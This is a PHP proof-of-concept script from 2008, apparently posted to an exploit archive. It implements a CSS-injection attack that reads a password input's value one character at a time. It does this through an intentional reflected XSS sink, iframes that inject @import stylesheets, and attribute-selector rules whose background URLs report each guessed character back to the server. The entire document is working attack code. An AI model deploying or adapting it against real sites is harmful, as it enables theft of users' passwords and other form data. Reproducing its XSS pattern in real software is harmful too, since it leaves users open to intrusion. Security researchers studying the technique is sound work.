css-read.txt
Posted on 23 October 2008
<?php /***** BEGIN LICENSE BLOCK ***** CSSH - a proof of concept CSS based history crawler Copyright (C) 2008 Sirdarckcat This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ***** END LICENSE BLOCK *****/ if (isset($_GET['source'])) { highlight_file(__FILE__); exit(); } session_start(); $file=basename(__FILE__); $d=$_GET['d']; $i=$_GET['i']; if(isset($_GET['logout'])) session_destroy(); if(isset($_GET['debug'])) print_r($_GET+$_SESSION); if(isset($_GET['css'])){ switch($d){ case 'range': ob_start("ob_gzhandler"); $_SESSION['range']=Array(); $_SESSION['value_']=""; $_SESSION['_value']=""; for($i=16;$i<=127;$i++){ //echo 'input[value*="\'.dechex($i).'"]{background:url("'.$file.'?backend&d=range&i=%'.dechex($i).'");}'; $_SESSION['range'][]=chr($i); } echo "body{background:url('$file?finished');}"; break; case 'reading': while(empty($_SESSION['range']))sleep(1); sleep(5);//session_start() locks the file loading, and we wait 5 seconds for reading next char ob_start("ob_gzhandler"); $range=$_SESSION['range']; $value_=strtr(urlencode($_SESSION['value_']),"%","\"); $_value=strtr(urlencode($_SESSION['_value']),"%","\"); foreach($range as $char){ $i=ord($char); echo 'input[value^="'.$value_.'\'.dechex($i).'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}'; echo 'input[value$="\'.dechex($i).$_value.'"] + *{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}'; echo 'input[value="'.$value_."\".dechex($i).$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.$_value.'");}'; echo " "; } break; } }else if(isset($_GET['backend'])){ switch($d){ case 'range': $_SESSION['range'][]=$i; header('Location: http://p42.us/x.png'); break; case 'beg': $_SESSION['value_'].=$i; case 'end': $_SESSION['_value']=$i.$_SESSION['_value']; case 'fin': $_SESSION['value']=$i; break; } }else if(isset($_GET['attack'])){ ?> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_?css%26d=range%22%3B</style>"></iframe> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_?css%26d=reading%22%3B</style>"/></iframe> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_?css%26d=reading%22%3B</style>"/></iframe> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe> <iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe> <?php }else{ if(isset($_POST['pass'])){ $_SESSION['knownvalue']=$_POST['pass']; } ?> <html> <head> <title>Start</title> <?php echo $_GET['xss'];?> </head> <body> <form method=POST> Enter something here and press enter <input name="pass" type="password" value="<?php echo $_SESSION['knownvalue']; ?>"/> </form> </body> </html> <?php } ?>
